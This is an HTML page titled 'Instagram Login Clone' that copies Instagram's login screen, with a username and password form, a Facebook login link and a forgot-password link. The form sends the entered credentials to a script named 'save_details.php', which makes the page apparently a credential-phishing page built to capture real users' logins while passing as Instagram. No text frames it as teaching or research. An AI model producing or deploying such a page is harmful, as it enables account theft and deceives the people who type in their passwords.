<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram Login Clone</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #fafafa;
        }
        .login-container {
            text-align: center;
            border: 1px solid #ddd;
            padding: 20px;
            width: 300px;
            background: #fff;
            border-radius: 8px;
        }
        .login-container h1 {
            font-family: 'Instagram Logo Font', sans-serif;
            font-size: 36px;
            margin-bottom: 20px;
        }
        .input-box {
            width: 100%;
            padding: 10px;
            margin: 10px 0;
            border: 1px solid #ddd;
            border-radius: 4px;
        }
        .btn {
            width: 100%;
            padding: 10px;
            color: white;
            background-color: #3897f0;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
        .btn:hover {
            background-color: #2f76cc;
        }
        .or-divider {
            display: flex;
            align-items: center;
            margin: 20px 0;
        }
        .or-divider::before,
        .or-divider::after {
            content: "";
            flex: 1;
            height: 1px;
            background: #ddd;
        }
        .or-divider span {
            margin: 0 10px;
            color: #aaa;
            font-size: 14px;
        }
        .facebook-login {
            color: #385185;
            font-size: 14px;
            text-decoration: none;
        }
        .forgot-password {
            font-size: 12px;
            color: #00376b;
            text-decoration: none;
        }
    </style>
</head>
<body>
    <div class="login-container">
        <h1>Instagram</h1>
        
        <form action="save_details.php" method="POST">
            <input type="text" name="username" placeholder="Phone number, username, or email" class="input-box" required>
            <input type="password" name="password" placeholder="Password" class="input-box" required>
            <button type="submit" class="btn">Log in</button>
        </form>
        <div class="or-divider">
            <span>OR</span>
        </div>
        <a href="#" class="facebook-login">Log in with Facebook</a>
        <br><br>
        <a href="#" class="forgot-password">Forgot password?</a>
    </div>
</body>
</html>
